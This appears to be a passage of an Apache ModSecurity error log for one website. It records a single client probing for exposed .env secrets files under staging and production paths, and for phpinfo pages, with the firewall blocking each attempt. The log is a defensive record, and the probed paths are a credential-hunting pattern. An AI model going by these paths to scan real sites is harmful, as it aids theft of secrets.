[Mon May 11 14:10:39.045954 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/qa/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBTQAAABU"]
[Mon May 11 14:10:39.046132 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/qa/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBTQAAABU"]
[Mon May 11 14:10:39.046388 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/qa/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBTQAAABU"]
[Mon May 11 14:10:39.126209 2026] [core:error] [pid 1320398:tid 1320410] [client 52.242.216.199:59523] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:39.126243 2026] [core:error] [pid 1320398:tid 1320410] [client 52.242.216.199:59523] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:39.233550 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /preview/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/preview/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBTgAAABU"]
[Mon May 11 14:10:39.233943 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/preview/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBTgAAABU"]
[Mon May 11 14:10:39.234121 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/preview/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBTgAAABU"]
[Mon May 11 14:10:39.234395 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/preview/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBTgAAABU"]
[Mon May 11 14:10:39.392979 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/beta/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBTwAAABU"]
[Mon May 11 14:10:39.393426 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/beta/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBTwAAABU"]
[Mon May 11 14:10:39.393634 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/beta/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBTwAAABU"]
[Mon May 11 14:10:39.393919 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/beta/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBTwAAABU"]
[Mon May 11 14:10:39.619967 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uat/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/uat/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBUAAAABU"]
[Mon May 11 14:10:39.620367 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/uat/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBUAAAABU"]
[Mon May 11 14:10:39.620553 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/uat/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBUAAAABU"]
[Mon May 11 14:10:39.620797 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/uat/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBUAAAABU"]
[Mon May 11 14:10:39.788848 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/stage/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBUgAAABU"]
[Mon May 11 14:10:39.789192 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/stage/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBUgAAABU"]
[Mon May 11 14:10:39.789352 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/stage/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBUgAAABU"]
[Mon May 11 14:10:39.789576 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/stage/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBUgAAABU"]
[Mon May 11 14:10:39.981963 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/development/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBUwAAABU"]
[Mon May 11 14:10:39.982353 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/development/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBUwAAABU"]
[Mon May 11 14:10:39.982541 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/development/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBUwAAABU"]
[Mon May 11 14:10:39.982795 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/development/.env"] [unique_id "agHHP6y-5-wpj6Sx56aBUwAAABU"]
[Mon May 11 14:10:40.184487 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/production/.env"] [unique_id "agHHQKy-5-wpj6Sx56aBVAAAABU"]
[Mon May 11 14:10:40.184842 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/production/.env"] [unique_id "agHHQKy-5-wpj6Sx56aBVAAAABU"]
[Mon May 11 14:10:40.185010 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/production/.env"] [unique_id "agHHQKy-5-wpj6Sx56aBVAAAABU"]
[Mon May 11 14:10:40.185250 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/production/.env"] [unique_id "agHHQKy-5-wpj6Sx56aBVAAAABU"]
[Mon May 11 14:10:40.426184 2026] [core:error] [pid 1319886:tid 1319913] [client 52.242.216.199:21722] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:40.426239 2026] [core:error] [pid 1319886:tid 1319913] [client 52.242.216.199:21722] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:40.468246 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/config/app/.env"] [unique_id "agHHQKy-5-wpj6Sx56aBVgAAABU"]
[Mon May 11 14:10:40.468641 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/config/app/.env"] [unique_id "agHHQKy-5-wpj6Sx56aBVgAAABU"]
[Mon May 11 14:10:40.468822 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/config/app/.env"] [unique_id "agHHQKy-5-wpj6Sx56aBVgAAABU"]
[Mon May 11 14:10:40.469110 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/config/app/.env"] [unique_id "agHHQKy-5-wpj6Sx56aBVgAAABU"]
[Mon May 11 14:10:40.658128 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php"] [unique_id "agHHQKy-5-wpj6Sx56aBVwAAABU"]
[Mon May 11 14:10:40.658349 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php"] [unique_id "agHHQKy-5-wpj6Sx56aBVwAAABU"]
[Mon May 11 14:10:40.658611 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/phpinfo.php"] [unique_id "agHHQKy-5-wpj6Sx56aBVwAAABU"]
[Mon May 11 14:10:40.862380 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/info.php"] 